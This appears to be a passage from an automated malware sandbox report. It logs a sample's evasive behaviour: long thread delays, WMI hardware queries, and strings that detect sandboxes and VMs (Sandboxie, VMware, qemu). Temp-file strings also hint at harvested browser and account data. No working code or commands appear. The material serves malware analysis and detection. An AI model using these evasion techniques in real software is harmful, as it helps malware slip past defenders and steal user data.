          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 1650000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2FE0000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 4FE0000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599718Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599593Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599465Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599355Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599249Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599140Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599031Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598921Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598810Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598699Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598593Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598484Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598374Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598265Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598149Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598039Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597922Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597812Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597695Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597578Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597372Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597265Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597155Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597044Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596937Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596827Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596716Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596609Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596499Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596389Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596281Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596171Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596053Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595922Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595797Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595687Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595574Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595466Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595354Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595242Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595078Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594929Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594796Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594625Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594484Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594326Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594124Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593984Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593835Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593705Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593575Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593456Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593324Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593200Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593085Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592941Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592608Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592343Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592156Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591988Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591859Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591741Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591625Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2271Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1018Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3737Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6087Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 3697Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 5925Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956Thread sleep count: 3737 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944Thread sleep count: 6087 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7988Thread sleep time: -17524406870024063s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -27670116110564310s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7000Thread sleep count: 3697 > 30Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -599718s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7000Thread sleep count: 5925 > 30Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -599593s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -599465s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -599355s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -599249s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -599140s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -599031s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -598921s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -598810s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -598699s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -598593s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -598484s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -598374s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -598265s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -598149s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -598039s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -597922s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -597812s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -597695s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -597578s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -597372s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -597265s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -597155s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -597044s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -596937s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -596827s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -596716s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -596609s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -596499s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -596389s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -596281s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -596171s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -596053s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -595922s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -595797s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -595687s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -595574s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -595466s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -595354s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -595242s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -595078s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -594929s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -594796s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -594625s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -594484s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -594326s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -594124s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -593984s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -593835s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -593705s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -593575s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -593456s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -593324s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -593200s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -593085s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -592941s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -592608s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -592343s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -592156s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -591988s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -591859s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -591741s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148Thread sleep time: -591625s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599718Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599593Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599465Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599355Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599249Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599140Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599031Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598921Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598810Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598699Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598593Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598484Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598374Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598265Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598149Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598039Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597922Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597812Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597695Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597578Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597372Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597265Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597155Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597044Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596937Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596827Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596716Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596609Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596499Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596389Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596281Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596171Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596053Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595922Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595797Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595687Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595574Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595466Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595354Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595242Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595078Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594929Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594796Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594625Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594484Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594326Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594124Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593984Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593835Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593705Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593575Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593456Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593324Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593200Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593085Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592941Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592608Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592343Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592156Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591988Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591859Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591741Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591625Jump to behavior
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
          Source: AddInProcess32.exe, 00000009.00000002.1740784660.0000000006230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.0000000003FE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: nawomaqemuv
          Source: tmpF3A4.tmp.dat.9.drBinary or memory string: AMC password management pageVMware20,11696494690
